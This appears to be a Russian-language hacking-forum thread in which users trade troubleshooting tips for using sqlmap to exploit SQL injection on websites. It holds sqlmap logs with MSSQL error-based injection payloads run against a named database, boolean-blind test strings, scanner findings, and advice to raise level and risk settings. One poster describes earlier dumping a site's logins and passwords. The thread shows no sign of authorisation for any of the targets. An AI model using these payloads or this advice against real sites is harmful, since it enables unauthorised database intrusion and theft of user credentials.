Такая трабла,есть скуля но мап не хочет куртить мотому что не видит ответ от сервера.Как указать строку где нужно смотреть.Знаю что есть команда --string но так и не разобрался как с ней работать
Добрый день подскажите как исправить данную ситуацию : При дампе БД или открытии таблиц , sqlmap выводит по одному символу через 3-5 сек. Предлагает использовать --time-sec соглашаюсь. Если отказаться, вообще не дампит
От чего это зависит? Если попробовать заюать другую уязвимость? У меня получалось лить БД (логины, пароли) причем достаточно быстро , но сейчас использую другую скулю и нужна другая таблица ( один и тот же сайт)
в данном случае стоит протестировать скрипт на --level 5 --risk 3, может быть булеан или юнион там есть.
web application technology: ASP.NET, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008 Пускает только в current-db,в соседние не пускает(.Есть два пользователя Админ и юзер я под юзером.У обоих нет пассов(по крайней мере null).Как подключиться под админом,или есть варинаты попасть в бд?
Code: sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTQ2Mjg4MDUwOA9kFgICCA9kFgQCBA8PFgIeB1Zpc2libGVoZGQCDA8 WAh8AaGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFBkltYWdlMQ==&productselect=All&keywordsearch=fd' AND 7226 IN (SELECT (CHAR(113) CHAR(122) CHAR(120) CHAR(113) CHAR(113) (SELECT (CASE WHEN (7226=7226) THEN CHAR(49) ELSE CHAR(48 ) END)) CHAR(113) CHAR(118) CHAR(118) CHAR(113) CHAR(113)))-- mvKE&Image1.x=11&Image1.y=14 Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) --- [05:28:16] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [05:28:16] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 R2 or 7 web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008 [05:28:16] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management sys tem databases' tables [05:28:16] [INFO] fetching tables for database: sfdsffsdf [05:28:16] [PAYLOAD] fd' AND 4667 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113)+(SELECT ISNULL(CAST(COUN T(OPS2013..sysusers.name+CHAR(46)+OPS2013..sysobjects.name) AS NVARCHAR(4000)),CHAR(32)) FROM OPS2013..sysobjects INNER JOIN OPS2013..sysusers ON OPS2013..sysobjects.uid BETWEEN OPS2013 AND OPS2013..sysusers.uid WHERE OPS2013..sysobjects.xt ype IN (CHAR(117),CHAR(118)))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(113)))-- ZTea [05:28:16] [WARNING] reflective value(s) found and filtering out [05:28:16] [WARNING] the SQL query provided does not return any output [05:28:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [05:28:16] [PAYLOAD] fd' AND 9754 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113)+(SELECT ISNULL(CAST(COUN T(name) AS NVARCHAR(4000)),CHAR(32)) FROM OPS2013..sysobjects WHERE xtype BETWEEN CHAR AND CHAR(85))+CHAR(113)+CHAR(118) +CHAR(118)+CHAR(113)+CHAR(113)))-- jCfI [05:28:17] [WARNING] the SQL query provided does not return any output [05:28:17] [CRITICAL] unable to retrieve the tables for any database Не могу получить таблицы parse-error Code: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster'
Не получается проэксплуатировать, если перейти по такой ссылке site.ru/filmnews/1, то респонс будет такой : HTML: <br /> <b>Warning</b>: implode() [<a href='function.implode'>function.implode</a>]: Invalid arguments passed in <b>/home/web/site/www/modules/filmnews.php</b> on line <b>42</b><br /> <br /> <b>Warning</b>: mysql_num_rows() expects parameter 1 to be resource, boolean given in <b>/home/web/site/www/modules/filmnews.php</b> on line <b>43</b><br /> � запуск sqlmap.py -u "site.ru/filmnews/1*" не помогает, складывается ощущение, что чего-то не хватает.
всем привет. такой вопрос: Существует ли в sqlmap такой синтаксис чтобы sqlmap не требовал подтверждения. Т.е не задавал вопрос типа "for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]" а автоматом ставил y или n ???
URL encoded POST input ctl00%24mainbody%24txtZip was set to (select convert(int,CHAR(65))) Error message found: SqlException (select convert(int,CHAR(65))) - это какой темпер?
Вообщем есть скуль, вроде бы не фейлс поситив, инъекция блинд. URL encoded GET input uid was set to -1 OR 3*2*1=6 AND 00095=00095 Tests performed: -1 OR 2+95-95-1=0+0+0+1 => TRUE -1 OR 3+95-95-1=0+0+0+1 => FALSE -1 OR 3*2<(0+5+95-95) => FALSE -1 OR 3*2>(0+5+95-95) => FALSE -1 OR 2+1-1-1=1 AND 00095=00095 => TRUE -1 OR 00095=00095 AND 3+1-1-1=1 => FALSE -1 OR 3*2=5 AND 00095=00095 => FALSE -1 OR 3*2=6 AND 00095=00095 => TRUE -1 OR 3*2*0=6 AND 00095=00095 => FALSE -1 OR 3*2*1=6 AND 00095=00095 => TRUE но скульмап почему то нивкакую не хочет зацепиться за линк, есть идеи? level 5 risk 3 пробовал, не видит.
Не всегда Акунетикс прав. Неправильно вставляешь ссылку невыставлен должный уровень скана --level 5 --risk 3 и еще куча других вариантов. Выложи то что нашел акунетикс.
